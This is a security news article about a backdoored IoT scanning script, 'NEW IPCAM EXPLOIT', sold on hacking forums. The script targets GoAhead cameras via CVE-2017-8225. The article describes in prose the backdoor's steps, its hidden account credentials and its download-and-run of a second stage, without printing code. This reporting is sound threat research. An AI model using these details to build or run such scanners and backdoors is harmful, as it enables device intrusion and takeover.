Security experts have discovered a new hacking tool dubbed NEW IPCAM EXPLOIT containing a backdoor that is offered on several underground hacking forums.
Wannabe hackers, be careful out of free hacking tools, many of them are scams. Recently security experts reported several cases of fake hacking tools hiding backdoors, for example, a fake Facebook hacking tool or the Cobian RAT.
Now, the security researcher Ankit Anubhav has discovered a new tool containing a backdoor that is offered on several underground hacking forums. The hacking tool is a free PHP script that allows users to scan the Internet for vulnerable IP Cameras running a vulnerable version of GoAhead embedded web-server.
“The market is particularly hot for IoT devices using a vulnerable version of an embedded GoAhead server. This arises due to the fact that there are a large number of IP camera vendors that can be hacked using exploits like CVE-2017–8225, and it is already employed successfully by the IoTroop/Reaper botnet.” wrote the researcher in a blog post.
“On 22nd October 2017, we observed a shady yet popular site that often hosts IoT botnet scripts had a new piece of code to offer. Labeled as “NEW IPCAM EXPLOIT”, this script promised to make the work of script kiddies easy by helping them locate IoT devices that use the potentially vulnerable embedded GoAhead server.”
The expert analyzed the NEW IPCAM EXPLOIT and discovered that it includes the code to hack the wannabe criminals using it, this implies that is the script kiddie owns a botnet, scammers can use the tool to take over it.
After going through all levels of decoding, the expert discovered that the NEW IPCAM EXPLOIT scan the web for devices using the GoAhead embedded server by checking for the banner “GoAhead-Webs”. At the bottom of the script, there is a backdoor which uses shellscript to connect to contact a malicious server, download a second-stage script, and execute it.
The NEW IPCAM EXPLOIT IoT scanning script works in four steps:
- The script scans a set of IP addresses looking for GoAhead servers vulnerable to the authentication bypass flaw tracked as CVE-2017-8225. The vulnerability affects Wireless IP Camera (P2P) WIFI CAM devices.
- The script establishes a secret backdoor by creating the user account (username: VM | password: Meme123) on the wannabe cybercriminal’s system. The scammer gains the same toot privileges as of the victim.
- The Script determine the IP address of the wannabe hacker in order to access the compromised systems remotely.
- The script runs a second payload on the victim’s system, in some cases, it installs the Kaiten bot.
Experts from Bleeping computers that made further investigations reported that the author of the script already put online backdoored hacking tools.